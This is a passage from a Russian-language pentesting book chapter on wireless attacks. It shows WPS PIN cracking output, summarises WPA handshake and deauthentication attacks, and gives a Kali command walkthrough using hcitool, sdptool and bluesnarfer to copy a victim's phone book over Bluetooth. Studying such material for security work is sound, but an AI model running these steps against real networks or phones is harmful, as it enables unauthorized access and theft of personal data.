Bluetooth 115
:4f
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Name: TL-WR841N [P] WPS Model Number: 9.0
[P] Access Point Serial Number: 1.0
[P] R-Nonce: 93:43:a6:a1:f0:a9:a0:f0:83:cb:f4:9a:05:74:d3:63
[P] PKR: 26:21:3b:92:c8:ea:eb:ca:45:76:27:ed:44:75:10:5d:a4:cf:12:d9:30:d3:b5:2f
...
[+]Pin cracked in 19215 seconds
[+]WPS PIN: `58820263`
[+]WPA PSK: `mysecretpass`
[+]AP SSID: `kakaha`
Теперь коротко рассмотрим другие способы взлома: WPA и WPA2.
Офлайн-атаки. Идея такова, что при нахождении достаточно близко к пользователю сети и/или точке доступа появляется возможность перехвата «рукопожатий» (handshake), пересылаемых между ними перед процессом аутентификации. Затем, в более спокойной обстановке, можно подобрать ключи.
Деаутентификационные атаки. На самом деле этот метод дополняет предыдущий. Согласитесь, что ждать, пока пользователи будут вновь подключаться к сети, можно достаточно долго, поэтому проще искусственно вызвать разъединение. Для этих целей даже есть специальная утилита Wifite. После того как соединение было разорвано, пользователь снова попытается подключиться к сети. Дальше все происходит уже указанным выше способом.
Перебор. Поскольку роутеры допускают неограниченное количество попыток аутентификации, можно воспользоваться уже известным нам методом перебора, однако это может занять очень много времени. Перебирать пароли к беспроводным сетям можно при помощи таких утилит, как aircrack-ng, aireplay-ng или KisMAC.
Bluetooth
В наши дни Bluetooth поддерживается огромным количеством устройств, что делает его достаточно привлекательным для взлома. Хотя эта технология имеет достаточно ограниченный радиус действия — около десяти метров, — нельзя списывать ее со счетов. В местах большого скопления людей, скажем, на конференциях, вы никогда не испытаете недостатка в целях.
Следует упомянуть о том, что данный лимит может быть превышен, если вы купите специальный адаптер, который позволит вам расширить зону действия до 1000 метров.
Работая с Bluetooth, надо помнить об основных режимах работы данных беспроводных устройств:
доступен для обнаружения — позволяет данному устройству быть обнаруженным другими устройствами;
116 Глава 7 • Беспроводные сети
ограниченная доступность для обнаружения — позволяет данному устройству быть обнаруженным другими устройствами в течение короткого промежутка времени;
недоступен для обнаружения — как следует из названия, данное устройство недоступно для обнаружения.
Так же, как и Wi-Fi, Bluetooth имеет ряд уязвимостей, которые позволяют атакующему получить несанкционированный доступ к информации и даже взять устройство под свой контроль. Вот только некоторые возможности:
получение копии календаря и записной книжки;удаленная активация камеры и микрофона;превращение телефона в прослушивающее устройство;
совершение звонков и использование устройства для доступа в Интернет;заражение устройства вирусом.
Приведем пример того, как можно получить данные с телефона жертвы. Вначале проведем подготовку:
root@kali:~# mkdir -p /dev/bluetooth/rfcomm
root@kali:~# mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 root@kali:~# rfkill unblock all
root@kali:~# hciconfig hci0 up
Проверим локальное устройство и выберем жертву:
root@kali:~# hciconfig hci0 |
|
hci0: Type: BR/EDR Bus: USB |
|
BD Address: 40:2C:F4:C5:08:80 |
ACL MTU: 1021:8 SCO MTU: 64:1 |
UP RUNNING |
|
RX bytes:1022 acl:0 sco:0 events:46 errors:0 |
|
TX bytes:678 acl:0 sco:0 commands:46 errors:0 |
|
root@kali:~# hcitool scan |
|
Scanning ... |
|
F6:64:B0:71:1D:D2 |
Nexus 3 |
Изучим список доступных сервисов на устройстве жертвы. Также определим номер канала, к которому мы впоследствии подключимся. Это будет последняя цифра в строке Channel/Port.
root@kali:~# sdptool browse --tree --l2cap F8:95:C7:72:10:E2
Browsing F6:64:B0:71:1D:D2...
Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x10000
Attribute Identifier : 0x1 — ServiceClassIDList
Резюме 117
Data Sequence UUID16 : 0x1801
Attribute Identifier : 0x4 — ProtocolDescriptorList Data Sequence
Data Sequence
UUID16 : 0x0100 — L2CAP Channel/Port (Integer) : 0x1f
Data Sequence UUID16 : 0x0007
...
Browsing F6:64:B0:71:1D:D2...
Service Search failed: Invalid argument Attribute Identifier : 0x0 — ServiceRecordHandle
Integer : 0x1000b
Attribute Identifier : 0x1 — ServiceClassIDList Data Sequence
UUID16 : 0x112f — Phonebook Access (PBAP) — PSE Attribute Identifier : 0x4 — ProtocolDescriptorList
Data Sequence Data Sequence
UUID16 : 0x0100 — L2CAP Data Sequence
UUID16 : 0x0003 — RFCOMM Channel/Port (Integer) : 0x13
Data Sequence
UUID16 : 0x0008 — OBEX
Attribute Identifier : 0x5 — BrowseGroupList Data Sequence
UUID16 : 0x1002 — PublicBrowseGroup
Attribute Identifier : 0x9 — BluetoothProfileDescriptorList Data Sequence
Data Sequence
UUID16 : 0x1130 — Phonebook Access (PBAP) Version (Integer) : 0x101
Attribute Identifier : 0x100
Data : 4f 42 45 58 20 50 68 6f 6e 65 62 6f 6f 6b 20 41 63 63 65 73 73 20 53 65 72 76 65 72 00 00
Attribute Identifier : 0x314 — SupportedRepositories Integer : 0x1
...
Теперь скопируем первые 100 записей из телефонной книги в файл:
root@kali:~# bluesnarfer -r 1-10 -C 3 -b F6:64:B0:71:1D:D2 > /root/p_book.txt
Резюме
Беспроводные сети являются одним из самых популярных способов передачи данных, это и делает их достаточно привлекательной мишенью для разного рода атак.
Для подключения к беспроводной сети нужна точка доступа. Одна точка доступа может обслуживать несколько беспроводных сетей. Помните, что радиус работы
118 Глава 7 • Беспроводные сети
каждой точки доступа ограничен, поэтому для его увеличения используют несколько точек, обслуживающих одну сеть.
Для подключения к беспроводной сети вам необходимо знать пароль и «имя» сети — SSID, он может быть скрыт или виден всем желающим.
Все данные, передающиеся по Wi-Fi, шифруются. Самый стойкий алгоритм шифрования — WPA2, самый небезопасный — WEP.
Взлом сети, использующей WEP-шифрование, достаточно прост. Вам просто необходимо собрать как можно больше пакетов, для этих целей хорошо подойдет утилита airmon-ng. Далее собранные данные можно обработать airodump-ng и получить ключ доступа.
Взломать сеть, использующую WPA2, гораздо сложнее. Для этого при помощи сниффера перехватите пакеты «рукопожатия» (handshake), а затем подберите ключи. Чтобы не ждать появления таких пакетов, при помощи утилиты Wifite можно «заставить» пользователей переподключиться к сети снова.
Получить доступ к точке доступа с сконфигурированным WPA2 можно, проведя атаку на Wi-Fi Protected Setup и подобрав PIN-код от устройства.
Как вы знаете, в мире беспроводных сетей существует еще одна интересная технология — Bluetooth. В наши дни он поддерживается всеми современными мобильными устройствами, что также делает его привлекательной целью. Через Bluetooth можно получить доступ к персональным данным, паролям или использовать взломанное устройство как точку входа в корпоративную сеть.